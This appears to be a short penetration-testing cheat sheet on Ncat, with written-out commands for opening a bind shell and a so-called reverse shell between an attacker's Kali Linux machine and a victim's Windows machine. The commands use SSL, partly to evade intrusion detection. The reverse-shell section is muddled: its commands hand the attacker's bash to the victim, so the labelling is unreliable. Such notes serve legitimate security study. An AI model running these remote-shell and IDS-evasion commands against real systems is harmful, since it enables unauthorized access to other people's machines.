Ncat

Improved version of netcat (e.g. encrypted communication).

Feature-packed networking utility that reads and writes data across networks from the command line. Ncat runs in two modes: client and server.

One of the major drawbacks of Netcat, from a penetration tester’s standpoint, is that it lacks the ability to authenticate and encrypt incoming and outgoing connections. These options provide an important layer of security while using these tools during a penetration test. Encryption of the bind or reverse shell will aid the penetration tester in avoiding intrusion detection systems, while allowing authentication on bind or reverse shells will ensure that use of these tools does not expose the penetrated machines to unwanted IP addresses.

Get a Windows command prompt from a Kali Linux machine (bind shell)

Bind shell: Attacker (Kali Linux) gets remote command prompt access on Victim’s machine (Windows)

# Will show the windows prompt on the kali machine
KALI_IP=x.x.x.x
VICTIM_IP=x.x.x.x

# On Victim machine (Windows):
#     Listen on port 4444, and execute a command on whoever connects
#     Set up an SSL encrypted connection on port 4444
#     Allow only Attacker's IP to connect to it
ncat --exec cmd.exe --allow $KALI_IP -vnl 4444 --ssl

# On the Attacker's machine (Kali Linux)
# Connect to Victim's public IP with SSL encryption enabled,
# preventing eavesdropping, and possibly even IDS detection
ncat -v $VICTIM_IP 4444 --ssl

Get a Windows command prompt from a Kali Linux machine (reverse shell)

Reverse shell: Victim (Windows) connects to Attacker (Kali Linux)

KALI_IP=x.x.x.x
VICTIM_IP=x.x.x.x

# Victim (Windows) listens on port 4444
ncat --allow $KALI_IP -vnl 4444 --ssl

# Attacker (Kali Linux) sends a reverse shell from his machine to Victim
# Attacker's ncat will have redirected input, output, and error from /bin/bash, to Victim's machine, on port 4444
ncat -v $VICTIM_IP 4444 -exec /bin/bash --ssl